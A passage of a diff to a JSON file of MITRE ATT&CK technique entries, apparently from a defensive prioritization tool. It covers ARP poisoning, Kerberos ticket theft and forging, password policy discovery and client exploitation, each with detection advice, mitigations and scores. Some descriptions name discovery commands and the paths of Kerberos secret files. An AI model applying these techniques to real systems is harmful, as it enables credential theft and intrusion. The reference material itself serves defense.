+            "SC-8",
+            "SI-10",
+            "SI-15",
+            "SI-3",
+            "SI-4"
         ],
-        "process_coverage": false,
+        "process_coverage": true,
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.14761904761904762,
-            "mitigation_score": 0.2545454545454545,
-            "detection_score": 0.03
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
-        "tid": "T1200",
-        "name": "Hardware Additions",
-        "description": "Adversaries may introduce computer accessories, computers, or networking hardware into a system or network that can be used as a vector to gain access. While public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping (Citation: Ossmann Star Feb 2011), network traffic modification (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) (Citation: Aleks Weapons Nov 2015), keystroke injection (Citation: Hak5 RubberDuck Dec 2016), kernel memory reading via DMA (Citation: Frisk DMA August 2016), addition of new wireless access to an existing network (Citation: McMillan Pwn March 2012), and others.",
-        "url": "https://attack.mitre.org/techniques/T1200",
+        "tid": "T1557.002",
+        "name": "Adversary-in-the-Middle: ARP Cache Poisoning",
+        "description": "Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002).\n\nThe ARP protocol is used to resolve IPv4 addresses to link layer addresses, such as a media access control (MAC) address.(Citation: RFC826 ARP) Devices in a local network segment communicate with each other by using link layer addresses. If a networked device does not have the link layer address of a particular networked device, it may send out a broadcast ARP request to the local network to translate the IP address to a MAC address. The device with the associated IP address directly replies with its MAC address. The networked device that made the ARP request will then use as well as store that information in its ARP cache.\n\nAn adversary may passively wait for an ARP request to poison the ARP cache of the requesting device. The adversary may reply with their MAC address, thus deceiving the victim by making them believe that they are communicating with the intended networked device. For the adversary to poison the ARP cache, their reply must be faster than the one made by the legitimate IP address owner. Adversaries may also send a gratuitous ARP reply that maliciously announces the ownership of a particular IP address to all the devices in the local network segment.\n\nThe ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)\n\nAdversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)\n",
+        "url": "https://attack.mitre.org/techniques/T1557/002",
         "tactics": [
-            "Initial Access"
+            "Collection",
+            "Credential Access"
         ],
-        "detection": "Asset management systems may help with the detection of computer systems or network devices that should not exist on a network. \n\nEndpoint sensors may be able to detect the addition of hardware via USB, Thunderbolt, and other external device communication ports.",
+        "detection": "Monitor network traffic for unusual ARP traffic, gratuitous ARP replies may be suspicious. \n\nConsider collecting changes to ARP caches across endpoints for signs of ARP poisoning. For example, if multiple IP addresses map to a single MAC address, this could be an indicator that the ARP cache has been poisoned.",
         "platforms": [
             "Linux",
             "Windows",
             "macOS"
         ],
-        "data_sources": [],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "data_sources": [
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1557",
         "subtechniques": [],
         "mitigations": [
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            },
+            {
+                "mid": "M1041",
+                "name": "Encrypt Sensitive Information",
+                "description": "Protect sensitive information with strong encryption.",
+                "url": "https://attack.mitre.org/mitigations/M1041"
+            },
+            {
+                "mid": "M1037",
+                "name": "Filter Network Traffic",
+                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                "url": "https://attack.mitre.org/mitigations/M1037"
+            },
             {
                 "mid": "M1035",
                 "name": "Limit Access to Resource Over Network",
@@ -8693,455 +31460,675 @@
                 "url": "https://attack.mitre.org/mitigations/M1035"
             },
             {
-                "mid": "M1034",
-                "name": "Limit Hardware Installation",
-                "description": "Block users or groups from installing or using unapproved hardware on systems, including USB devices.",
-                "url": "https://attack.mitre.org/mitigations/M1034"
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            },
+            {
+                "mid": "M1017",
+                "name": "User Training",
+                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                "url": "https://attack.mitre.org/mitigations/M1017"
             }
         ],
-        "cumulative_score": 0.26285879714285715,
-        "adjusted_score": 0.26285879714285715,
+        "cumulative_score": 0.45238095238095244,
+        "adjusted_score": 0.45238095238095244,
         "has_car": false,
-        "has_sigma": true,
+        "has_sigma": false,
         "has_es_siem": false,
-        "has_splunk": true,
+        "has_splunk": false,
         "cis_controls": [
-            "1.1",
-            "1.2",
-            "1.4",
             "4.1",
             "4.2",
+            "4.4",
+            "4.8",
+            "7.6",
+            "7.7",
             "12.2",
-            "12.6",
-            "13.9"
+            "13.3",
+            "13.8",
+            "14.2",
+            "14.6",
+            "18.2",
+            "18.3",
+            "18.5",
+            "3.10"
         ],
         "nist_controls": [
+            "AC-16",
+            "AC-17",
+            "AC-18",
+            "AC-19",
             "AC-20",
             "AC-3",
-            "AC-6",
-            "MP-7",
-            "SC-41"
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "SC-23",
+            "SC-4",
+            "SC-7",
+            "SC-8",
+            "SI-10",
+            "SI-12",
+            "SI-15",
+            "SI-3",
+            "SI-4",
+            "SI-7"
         ],
         "process_coverage": false,
         "network_coverage": true,
-        "file_coverage": true,
+        "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": true,
-        "actionability_score": {
-            "combined_score": 0.15714285714285714,
-            "mitigation_score": 0.23636363636363636,
-            "detection_score": 0.07
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0.00571594
+        "hardware_coverage": false
     },
     {
-        "tid": "T1201",
-        "name": "Password Policy Discovery",
-        "description": "Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).\n\nPassword policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), Get-ADDefaultDomainPasswordPolicy, chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies (Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies).\n\nPassword policies can be discovered in cloud environments using available APIs such as GetAccountPasswordPolicy in AWS (Citation: AWS GetPasswordPolicy).",
-        "url": "https://attack.mitre.org/techniques/T1201",
+        "tid": "T1558",
+        "name": "Steal or Forge Kerberos Tickets",
+        "description": "Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting.  Attackers may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.\n\nOn Windows, the built-in klist utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)\n\nLinux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the \"ccache\". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)\n\n\nKerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the /etc/krb5.conf configuration file and the KRB5CCNAME environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using kinit, klist, ktutil, and kcc built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)\n",
+        "url": "https://attack.mitre.org/techniques/T1558",
         "tactics": [
-            "Discovery"
+            "Credential Access"
         ],
-        "detection": "Monitor logs and processes for tools and command line arguments that may indicate they're being used for password policy discovery. Correlate that activity with other suspicious activity from the originating system to reduce potential false positives from valid user or administrator activity. Adversaries will likely attempt to find the password policy early in an operation and the activity is likely to happen with other Discovery activity.",
+        "detection": "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within ticket granting tickets (TGTs), and ticket granting service (TGS) requests without preceding TGT requests.(Citation: ADSecurity Detecting Forged Tickets)(Citation: Stealthbits Detect PtT 2019)(Citation: CERT-EU Golden Ticket Protection)\n\nMonitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)\n\nMonitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. \n\nEnable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018) (Citation: AdSecurity Cracking Kerberos Dec 2015)\n\nMonitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.\n\nMonitor for unusual processes accessing secrets.ldb and .secrets.mkey located in /var/lib/sss/secrets/.",
         "platforms": [
-            "IaaS",
             "Linux",
             "Windows",
             "macOS"
         ],
         "data_sources": [
+            "Active Directory: Active Directory Credential Request",
             "Command: Command Execution",
-            "Process: Process Creation",
-            "User Account: User Account Metadata"
+            "File: File Access",
+            "Logon Session: Logon Session Metadata"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
-        "subtechniques": [],
+        "subtechniques": [
+            {
+                "tid": "T1558.001",
+                "name": "Steal or Forge Kerberos Tickets: Golden Ticket",
+                "url": "https://attack.mitre.org/techniques/T1558/001",
+                "description": "Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation: AdSecurity Kerberos GT Aug 2015) Golden tickets enable adversaries to generate authentication material for any account in Active Directory.(Citation: CERT-EU Golden Ticket Protection) \n\nUsing a golden ticket, adversaries are then able to request ticket granting service (TGS) tickets, which enable access to specific resources. Golden tickets require adversaries to interact with the Key Distribution Center (KDC) in order to obtain TGS.(Citation: ADSecurity Detecting Forged Tickets)\n\nThe KDC service runs all on domain controllers that are part of an Active Directory domain. KRBTGT is the Kerberos Key Distribution Center (KDC) service account and is responsible for encrypting and signing all Kerberos tickets.(Citation: ADSecurity Kerberos and KRBTGT) The KRBTGT password hash may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) and privileged access to a domain controller.",
+                "detection": "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within TGTs, and TGS requests without preceding TGT requests.(Citation: ADSecurity Kerberos and KRBTGT)(Citation: CERT-EU Golden Ticket Protection)(Citation: Stealthbits Detect PtT 2019)\n\nMonitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)\n\nMonitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. \n",
+                "mitigations": [
+                    {
+                        "mid": "M1015",
+                        "name": "Active Directory Configuration",
+                        "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.",
+                        "url": "https://attack.mitre.org/mitigations/M1015"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    }
+                ]
+            },
+            {
+                "tid": "T1558.002",
+                "name": "Steal or Forge Kerberos Tickets: Silver Ticket",
+                "url": "https://attack.mitre.org/techniques/T1558/002",
+                "description": "Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)\n\nSilver tickets are more limited in scope in than golden tickets in that they only enable adversaries to access a particular resource (e.g. MSSQL) and the system that hosts the resource; however, unlike golden tickets, adversaries with the ability to forge silver tickets are able to create TGS tickets without interacting with the Key Distribution Center (KDC), potentially making detection more difficult.(Citation: ADSecurity Detecting Forged Tickets)\n\nPassword hashes for target services may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).",
+                "detection": "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4634, 4672).(Citation: ADSecurity Detecting Forged Tickets) \n\nMonitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.",
+                "mitigations": [
+                    {
+                        "mid": "M1041",
+                        "name": "Encrypt Sensitive Information",
+                        "description": "Protect sensitive information with strong encryption.",
+                        "url": "https://attack.mitre.org/mitigations/M1041"
+                    },
+                    {
+                        "mid": "M1027",
+                        "name": "Password Policies",
+                        "description": "Set and enforce secure password policies for accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1027"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    }
+                ]
+            },
+            {
+                "tid": "T1558.003",
+                "name": "Steal or Forge Kerberos Tickets: Kerberoasting",
+                "url": "https://attack.mitre.org/techniques/T1558/003",
+                "description": "Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to [Brute Force](https://attack.mitre.org/techniques/T1110).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) \n\nService principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service(Citation: Microsoft Detecting Kerberoasting Feb 2018)).(Citation: Microsoft SPN)(Citation: Microsoft SetSPN)(Citation: SANS Attacking Kerberos Nov 2014)(Citation: Harmj0y Kerberoast Nov 2016)\n\nAdversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://attack.mitre.org/techniques/T1110) attacks that may expose plaintext credentials.(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016)\n\nThis same attack could be executed using service tickets captured from network traffic.(Citation: AdSecurity Cracking Kerberos Dec 2015)\n\nCracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014)",
+                "detection": "Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation: AdSecurity Cracking Kerberos Dec 2015)",
+                "mitigations": [
+                    {
+                        "mid": "M1041",
+                        "name": "Encrypt Sensitive Information",
+                        "description": "Protect sensitive information with strong encryption.",
+                        "url": "https://attack.mitre.org/mitigations/M1041"
+                    },
+                    {
+                        "mid": "M1027",
+                        "name": "Password Policies",
+                        "description": "Set and enforce secure password policies for accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1027"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    }
+                ]
+            },
+            {
+                "tid": "T1558.004",
+                "name": "Steal or Forge Kerberos Tickets: AS-REP Roasting",
+                "url": "https://attack.mitre.org/techniques/T1558/004",
+                "description": "Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002) Kerberos messages.(Citation: Harmj0y Roasting AS-REPs Jan 2017) \n\nPreauthentication offers protection against offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002). When enabled, a user requesting access to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request (AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to successfully decrypt the timestamp with the hash of the user’s password, it will then send an Authentication Server Response (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is signed with the user’s password.(Citation: Microsoft Kerberos Preauth 2014)\n\nFor each account found without preauthentication, an adversary may send an AS-REQ message without the encrypted timestamp and receive an AS-REP message with TGT data which may be encrypted with an insecure algorithm such as RC4. The recovered encrypted data may be vulnerable to offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002) attacks similarly to [Kerberoasting](https://attack.mitre.org/techniques/T1558/003) and expose plaintext credentials. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019) \n\nAn account registered to a domain, with or without special privileges, can be abused to list all domain accounts that have preauthentication disabled by utilizing Windows tools like [PowerShell](https://attack.mitre.org/techniques/T1059/001) with an LDAP filter. Alternatively, the adversary may send an AS-REQ message for each user. If the DC responds without errors, the account does not require preauthentication and the AS-REP message will already contain the encrypted data. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019)\n\nCracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014)",
+                "detection": "Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17], pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation: Microsoft 4768 TGT 2017)",
+                "mitigations": [
+                    {
+                        "mid": "M1047",
+                        "name": "Audit",
+                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                        "url": "https://attack.mitre.org/mitigations/M1047"
+                    },
+                    {
+                        "mid": "M1041",
+                        "name": "Encrypt Sensitive Information",
+                        "description": "Protect sensitive information with strong encryption.",
+                        "url": "https://attack.mitre.org/mitigations/M1041"
+                    },
+                    {
+                        "mid": "M1027",
+                        "name": "Password Policies",
+                        "description": "Set and enforce secure password policies for accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1027"
+                    }
+                ]
+            }
+        ],
         "mitigations": [
+            {
+                "mid": "M1015",
+                "name": "Active Directory Configuration",
+                "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1015"
+            },
+            {
+                "mid": "M1041",
+                "name": "Encrypt Sensitive Information",
+                "description": "Protect sensitive information with strong encryption.",
+                "url": "https://attack.mitre.org/mitigations/M1041"
+            },
             {
                 "mid": "M1027",
                 "name": "Password Policies",
                 "description": "Set and enforce secure password policies for accounts.",
                 "url": "https://attack.mitre.org/mitigations/M1027"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
             }
         ],
-        "cumulative_score": 0.21064284952380952,
-        "adjusted_score": 0.21064284952380952,
+        "cumulative_score": 0.55491824,
+        "adjusted_score": 0.55491824,
         "has_car": false,
-        "has_sigma": true,
+        "has_sigma": false,
         "has_es_siem": false,
         "has_splunk": true,
-        "cis_controls": [],
-        "nist_controls": [
-            "CA-7",
-            "CM-2",
-            "CM-6",
-            "SI-3",
-            "SI-4"
-        ],
-        "process_coverage": true,
-        "network_coverage": false,
-        "file_coverage": true,
-        "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.10952380952380952,
-            "mitigation_score": 0.10909090909090909,
-            "detection_score": 0.11
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0.00111904
-    },
-    {
-        "tid": "T1202",
-        "name": "Indirect Command Execution",
-        "description": "Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)\n\nAdversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.",
-        "url": "https://attack.mitre.org/techniques/T1202",
-        "tactics": [
-            "Defense Evasion"
-        ],
-        "detection": "Monitor and analyze logs from host-based detection mechanisms, such as Sysmon, for events such as process creations that include or are resulting from parameters associated with invoking programs/commands/files and/or spawning child processes/network connections. (Citation: RSA Forfiles Aug 2017)",
-        "platforms": [
-            "Windows"
+        "cis_controls": [
+            "4.1",
+            "4.7",
+            "5.2",
+            "5.3",
+            "5.4",
+            "5.5",
+            "6.1",
+            "6.2",
+            "6.8",
+            "18.3",
+            "18.5",
+            "3.10"
         ],
-        "data_sources": [
-            "Command: Command Execution",
-            "Process: Process Creation"
+        "nist_controls": [
+            "AC-16",
+            "AC-17",
+            "AC-18",
+            "AC-19",
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CM-2",
+            "CM-5",
+            "CM-6",
+            "IA-2",
+            "IA-5",
+            "SC-4",
+            "SI-12",
+            "SI-3",
+            "SI-4",
+            "SI-7"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [],
-        "mitigations": [],
-        "cumulative_score": 0.27053181238095236,
-        "adjusted_score": 0.27053181238095236,
-        "has_car": false,
-        "has_sigma": true,
-        "has_es_siem": false,
-        "has_splunk": true,
-        "cis_controls": [],
-        "nist_controls": [],
         "process_coverage": true,
         "network_coverage": false,
-        "file_coverage": false,
+        "file_coverage": true,
         "cloud_coverage": false,
         "hardware_coverage": false,
         "actionability_score": {
-            "combined_score": 0.15238095238095237,
-            "detection_score": 0.32
+            "combined_score": 0.3,
+            "mitigation_score": 0.5636363636363636,
+            "detection_score": 0.01
         },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0.01815086
+        "choke_point_score": 0.25,
+        "prevalence_score": 0.00491824
     },
     {
-        "tid": "T1203",
-        "name": "Exploitation for Client Execution",
-        "description": "Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.\n\nSeveral types exist:\n\n### Browser-based Exploitation\n\nWeb browsers are a common target through [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) and [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.\n\n### Office Applications\n\nCommon office and productivity applications such as Microsoft Office are also targeted through [Phishing](https://attack.mitre.org/techniques/T1566). Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.\n\n### Common Third-party Applications\n\nOther applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.",
-        "url": "https://attack.mitre.org/techniques/T1203",
+        "tid": "T1558.001",
+        "name": "Steal or Forge Kerberos Tickets: Golden Ticket",
+        "description": "Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation: AdSecurity Kerberos GT Aug 2015) Golden tickets enable adversaries to generate authentication material for any account in Active Directory.(Citation: CERT-EU Golden Ticket Protection) \n\nUsing a golden ticket, adversaries are then able to request ticket granting service (TGS) tickets, which enable access to specific resources. Golden tickets require adversaries to interact with the Key Distribution Center (KDC) in order to obtain TGS.(Citation: ADSecurity Detecting Forged Tickets)\n\nThe KDC service runs all on domain controllers that are part of an Active Directory domain. KRBTGT is the Kerberos Key Distribution Center (KDC) service account and is responsible for encrypting and signing all Kerberos tickets.(Citation: ADSecurity Kerberos and KRBTGT) The KRBTGT password hash may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) and privileged access to a domain controller.",
+        "url": "https://attack.mitre.org/techniques/T1558/001",
         "tactics": [
-            "Execution"
+            "Credential Access"
         ],
-        "detection": "Detecting software exploitation may be difficult depending on the tools available. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the browser or Office processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.",
+        "detection": "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within TGTs, and TGS requests without preceding TGT requests.(Citation: ADSecurity Kerberos and KRBTGT)(Citation: CERT-EU Golden Ticket Protection)(Citation: Stealthbits Detect PtT 2019)\n\nMonitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)\n\nMonitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. \n",
         "platforms": [
-            "Linux",
-            "Windows",
-            "macOS"
+            "Windows"
         ],
-        "data_sources": [],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "data_sources": [
+            "Active Directory: Active Directory Credential Request",
+            "Logon Session: Logon Session Metadata"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1558",
         "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1048",
-                "name": "Application Isolation and Sandboxing",
-                "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.",
-                "url": "https://attack.mitre.org/mitigations/M1048"
+                "mid": "M1015",
+                "name": "Active Directory Configuration",
+                "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1015"
             },
             {
-                "mid": "M1050",
-                "name": "Exploit Protection",
-                "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.",
